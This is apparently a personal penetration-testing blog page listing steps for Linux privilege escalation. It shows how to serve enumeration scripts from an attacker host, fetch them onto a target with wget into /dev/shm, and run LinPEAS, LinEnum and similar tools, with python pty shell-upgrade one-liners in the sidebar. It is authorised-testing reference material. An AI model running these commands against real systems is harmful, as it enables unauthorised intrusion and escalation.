akde/infosec

Information security is ultimately about managing risk

Linux privilege escalation scripts

,
,

Pre­pare the own system:

cd p151.general.1
./scripts/update_privesc_scripts.sh
cd scripts/privesc/linux
python -m SimpleHTTPServer 80

Pre­pare the target:

cd /dev/shm
wget http://$attackerip/_ex.tar
tar xf _ex.tar
script

Now, exe­cute it:

  1. Lin­Peas: ./linpeas.sh
  2. LinEnum: ./LinEnum.sh
  3. lin­ux-smart-enu­mer­a­tion: ./lse.sh ‑l1
  4. lin­ux-exploit-sug­gester‑2: ./linux-exploit-suggester‑2.pl
  5. sudo-killer: ./SUDO_KILLERv2.0.5.sh
  6. lin­ux­privcheck­er: ./linuxprivchecker.py

Final­ly: Copy type­script file to the PentestManager!

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';